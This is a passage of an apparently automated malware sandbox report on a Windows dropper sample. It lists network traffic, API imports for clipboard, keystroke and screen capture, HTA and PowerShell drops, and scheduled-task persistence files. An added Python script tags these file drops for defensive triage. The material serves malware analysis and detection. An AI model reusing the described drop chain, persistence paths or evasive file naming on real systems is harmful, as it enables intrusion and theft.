                                                Source: ILqcVeT.exe, 00000017.00000003.2350740881.000000000BBF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                                                Source: ILqcVeT.exe, 00000017.00000002.2385311293.0000000001035000.00000040.00000001.01000000.00000013.sdmp, ILqcVeT.exe, 00000017.00000002.2385311293.0000000001054000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                                                Source: ILqcVeT.exe, 00000017.00000003.2350740881.000000000BBF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                                                Source: ILqcVeT.exe, 00000017.00000002.2385311293.0000000001035000.00000040.00000001.01000000.00000013.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50611
Source: unknown | Network traffic detected: HTTP traffic on port 50636 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53889
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown | Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53928
Source: unknown | Network traffic detected: HTTP traffic on port 64532 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 53736 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 59943
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50574
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50532
Source: unknown | Network traffic detected: HTTP traffic on port 53659 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 53957 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64771
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64532
Source: unknown | Network traffic detected: HTTP traffic on port 50532 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64776
Source: unknown | Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53659
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53736
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50549
Source: unknown | Network traffic detected: HTTP traffic on port 50574 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown | Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 53928 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 64821 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64823
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64662
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64783
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64586
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64784
Source: unknown | Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 64771 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64821
Source: unknown | Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 50611 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53747
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50636
Source: unknown | Network traffic detected: HTTP traffic on port 53889 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 59943 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 64662 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 64784 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 53747 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64756
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53957
Source: unknown | Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 64776 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 50549 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53950
Source: unknown | Network traffic detected: HTTP traffic on port 64823 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 64783 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 64756 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 64586 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 53950 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown | Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:59943 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:64532 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:64586 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:64662 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:64756 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:64821 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.11:64823 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.24.225:443 -> 192.168.2.11:53736 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:53747 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.24.225:443 -> 192.168.2.11:53889 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.11:53928 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.24.225:443 -> 192.168.2.11:53950 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:53957 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.11:50532 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.24.225:443 -> 192.168.2.11:50549 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.11:50574 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.24.225:443 -> 192.168.2.11:50611 version: TLS 1.2
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C8EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00C8EAFF
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C8ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00C8ED6A
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe | Code function: 20_2_00BB61F0 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority,20_2_00BB61F0
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C7AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_00C7AA57
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00CA9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00CA9576

Spam, unwanted Advertisements and Ransom Demands

Source: SMTP | Network traffic detected: Mail traffic on many different IPs 71

System Summary

                                                Source: 0000003E.00000002.2594796685.000000000DB1E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
                                                Source: 0000003E.00000002.2594796685.000000000DBAE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
                                                Source: 0000003E.00000002.2594796685.000000000DAC8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
                                                Source: aV2ffcSuKl.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                                                Source: aV2ffcSuKl.exe, 00000000.00000000.1292608994.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_4452ee9f-a
                                                Source: aV2ffcSuKl.exe, 00000000.00000000.1292608994.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_e70eb728-d
                                                Source: 132fd7f0ed.exe, 0000001E.00000000.2085502700.0000000000382000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_defb02a8-e
                                                Source: 132fd7f0ed.exe, 0000001E.00000000.2085502700.0000000000382000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_22d1a84d-6
                                                Source: 132fd7f0ed.exe, 0000003D.00000000.2228800526.0000000000382000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_0e236601-a
                                                Source: 132fd7f0ed.exe, 0000003D.00000000.2228800526.0000000000382000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_08ab988b-0
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe File created: C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta
Source: C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exe File created: C:\Users\user\AppData\Local\Temp\rKRHHhiYP.hta
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Temp\plDCQRtK9.hta
Source: C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exe File created: C:\Users\user\AppData\Local\Temp\1lEt3ife9.hta
Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE.6.dr Static PE information: section name:
Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE.6.dr Static PE information: section name: .idata
Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE.6.dr Static PE information: section name:
Source: rapes.exe.11.dr Static PE information: section name:
Source: rapes.exe.11.dr Static PE information: section name: .idata
Source: rapes.exe.11.dr Static PE information: section name:
Source: random[1].exe.16.dr Static PE information: section name:
Source: random[1].exe.16.dr Static PE information: section name: .idata
Source: random[1].exe.16.dr Static PE information: section name:
Source: 7dbaa342f5.exe.16.dr Static PE information: section name:
Source: 7dbaa342f5.exe.16.dr Static PE information: section name: .idata
Source: 7dbaa342f5.exe.16.dr Static PE information: section name:
Source: ILqcVeT[1].exe.16.dr Static PE information: section name:
Source: ILqcVeT[1].exe.16.dr Static PE information: section name: .rsrc
Source: ILqcVeT[1].exe.16.dr Static PE information: section name: .idata
Source: ILqcVeT[1].exe.16.dr Static PE information: section name:
Source: ILqcVeT.exe.16.dr Static PE information: section name:
Source: ILqcVeT.exe.16.dr Static PE information: section name: .rsrc
Source: ILqcVeT.exe.16.dr Static PE information: section name: .idata
Source: ILqcVeT.exe.16.dr Static PE information: section name:
Source: rXOl0pp[1].exe.16.dr Static PE information: section name:
Source: rXOl0pp[1].exe.16.dr Static PE information: section name: .rsrc
Source: rXOl0pp[1].exe.16.dr Static PE information: section name: .idata
Source: rXOl0pp[1].exe.16.dr Static PE information: section name:
Source: rXOl0pp.exe.16.dr Static PE information: section name:
Source: rXOl0pp.exe.16.dr Static PE information: section name: .rsrc
Source: rXOl0pp.exe.16.dr Static PE information: section name: .idata
Source: rXOl0pp.exe.16.dr Static PE information: section name:
Source: random[2].exe.16.dr Static PE information: section name:
Source: random[2].exe.16.dr Static PE information: section name: .idata
Source: random[2].exe.16.dr Static PE information: section name:
Source: 5a57aa51d3.exe.16.dr Static PE information: section name:
Source: 5a57aa51d3.exe.16.dr Static PE information: section name: .idata
Source: 5a57aa51d3.exe.16.dr Static PE information: section name:
Source: random[2].exe0.16.dr Static PE information: section name:
Source: random[2].exe0.16.dr Static PE information: section name: .idata
Source: random[2].exe0.16.dr Static PE information: section name:
Source: f0b421a199.exe.16.dr Static PE information: section name:
Source: f0b421a199.exe.16.dr Static PE information: section name: .idata
Source: f0b421a199.exe.16.dr Static PE information: section name:
Source: random[1].exe1.16.dr Static PE information: section name:
Source: random[1].exe1.16.dr Static PE information: section name: .idata
Source: c105f06ef0.exe.16.dr Static PE information: section name:
Source: c105f06ef0.exe.16.dr Static PE information: section name: .idata
Source: random[3].exe.16.dr Static PE information: section name:
Source: random[3].exe.16.dr Static PE information: section name: .idata
Source: random[3].exe.16.dr Static PE information: section name:
Source: 5ef8bafe70.exe.16.dr Static PE information: section name:
Source: 5ef8bafe70.exe.16.dr Static PE information: section name: .idata
Source: 5ef8bafe70.exe.16.dr Static PE information: section name:
Source: random[2].exe1.16.dr Static PE information: section name:
Source: random[2].exe1.16.dr Static PE information: section name: .idata
Source: random[2].exe1.16.dr Static PE information: section name:
Source: df2fea7261.exe.16.dr Static PE information: section name:
Source: df2fea7261.exe.16.dr Static PE information: section name: .idata
Source: df2fea7261.exe.16.dr Static PE information: section name:
Source: vertualiziren[1].exe.22.dr Static PE information: section name:
Source: vertualiziren[1].exe.22.dr Static PE information: section name: .idata
Source: vertualiziren[1].exe.22.dr Static PE information: section name:
Source: vertualiziren.exe.22.dr Static PE information: section name:
Source: vertualiziren.exe.22.dr Static PE information: section name: .idata
Source: vertualiziren.exe.22.dr Static PE information: section name:
Source: benskvi.exe.24.dr Static PE information: section name:
Source: benskvi.exe.24.dr Static PE information: section name: .idata
Source: benskvi.exe.24.dr Static PE information: section name:
Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE.35.dr Static PE information: section name:
Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE.35.dr Static PE information: section name: .idata
Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE.35.dr Static PE information: section name:
Source: 483d2fa8a0d53818306efeb32d3.exe.58.dr Static PE information: section name:
Source: 483d2fa8a0d53818306efeb32d3.exe.58.dr Static PE information: section name: .idata
Source: 483d2fa8a0d53818306efeb32d3.exe.58.dr Static PE information: section name:
Source: TempJAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE.67.dr Static PE information: section name:
Source: TempJAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE.67.dr Static PE information: section name: .idata
Source: TempJAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE.67.dr Static PE information: section name:
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\TempJAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe Code function: 0_2_00C7D5EB: CreateFileW,DeviceIoControl,CloseHandle
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe Code function: 0_2_00C71201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe Code function: 0_2_00C7E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE File created: C:\Windows\Tasks\rapes.job
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe File created: C:\Windows\Tasks\Gxtuum.job
Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exe File created: C:\Windows\Tasks\Test Task17.job
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
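The "File created" entries above (the HTA drops, the PowerShell-written executables under AppData\Local, and the .job files in C:\Windows\Tasks) are the quickest way to reconstruct the drop chain. The script below is an added triage helper, not Joe Sandbox tooling: it parses lines in the report's "Source: <process> File created: <path>" form (tolerating the fused "exeFile created" spacing and trailing "Jump to ..." link text that the page export produces) and tags each drop with the execution or persistence vector it implies. The sample lines are copied from this report; the tag names and the script-host list are this example's own choices.

```python
"""
Triage of 'File created' report entries.

Added example, not Joe Sandbox code. Parses 'Source: <process> File created: <path>'
lines and tags each drop. Sample lines are copied from this report; tag names and
SCRIPT_HOSTS are this example's own assumptions.
"""
import re
from collections import Counter, defaultdict

LINE_RE = re.compile(
    r"Source:\s*(?P<src>.+?)\s*File created:\s*(?P<path>.+?)"
    r"\s*(?:Jump to (?:behavior|dropped file))?\s*$"
)

# Hosts that should not normally be writing executables or HTAs to disk (assumed list).
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Lines copied from this report, as they appear on the page.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\aV2ffcSuKl.exeFile created: C:\Users\user\AppData\Local\Temp\sGwBNuRjx.htaJump to behavior",
    r"Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Temp\plDCQRtK9.hta",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXEJump to dropped file",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeJump to dropped file",
    r"Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEFile created: C:\Windows\Tasks\rapes.jobJump to behavior",
    r"Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp",
]


def parse_line(line: str):
    """Split one report line into (writer process path, created file path), or None."""
    m = LINE_RE.search(line)
    return (m.group("src"), m.group("path")) if m else None


def tag_drop(src: str, path: str):
    """Heuristic tags for a single file-creation event."""
    tags = []
    low = path.lower()
    proc = src.rsplit("\\", 1)[-1].lower()
    if low.endswith(".hta"):
        tags.append("hta-drop")                  # HTML Application; executes through mshta.exe
        if proc in SCRIPT_HOSTS:
            tags.append("script-host-wrote-hta")
    if low.startswith("c:\\windows\\tasks\\") and low.endswith(".job"):
        tags.append("at-job-persistence")        # Task Scheduler 1.0 job file (legacy at.exe format)
    if low.endswith(".exe"):
        tags.append("pe-drop")
        if proc in SCRIPT_HOSTS:
            tags.append("script-host-wrote-pe")
        # Name begins with 'Temp' directly under AppData\Local, i.e. not inside the Temp\ folder.
        # Hunting in %TEMP% alone misses these; %LOCALAPPDATA%\Temp*.EXE is the right scope.
        if re.search(r"\\appdata\\local\\temp[^\\]+\.exe$", low):
            tags.append("temp-prefixed-name-under-local")
    return tags


def triage(lines):
    """Group tagged drops by the process that wrote them."""
    by_writer = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            src, path = parsed
            by_writer[src].append({"path": path, "tags": tag_drop(src, path)})
    return dict(by_writer)


def summarize(by_writer):
    """Count how often each tag occurs across all writers."""
    return Counter(t for drops in by_writer.values() for d in drops for t in d["tags"])


if __name__ == "__main__":
    result = triage(SAMPLE_LINES)
    for writer, drops in result.items():
        print(writer)
        for d in drops:
            print("   ", d["path"], d["tags"])
    print(summarize(result))
```

Feed it the whole "File created" block of a report and the per-writer view shows which process is the dropper and which paths need collecting; the "temp-prefixed-name-under-local" tag exists because two of the PowerShell drops above sit directly under AppData\Local with a "Temp" name prefix rather than inside the Temp folder, which matters when writing a collection or hunt query.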
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe Code function: 0_2_00C82046
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe Code function: 0_2_00C18060
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe Code function: 0_2_00C78298
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe Code function: 0_2_00C4E4FF
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe Code function: 0_2_00C4676B
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe Code function: 0_2_00CA4873
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe Code function: 0_2_00C1CAF0
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe Code function: 0_2_00C3CAA0
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe Code function: 0_2_00C2CC39
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe Code function: 0_2_00C46DD9
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe Code function: 0_2_00C191C0
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe Code function: 0_2_00C2B119
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe Code function: 0_2_00C31394
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe Code function: 0_2_00C31706
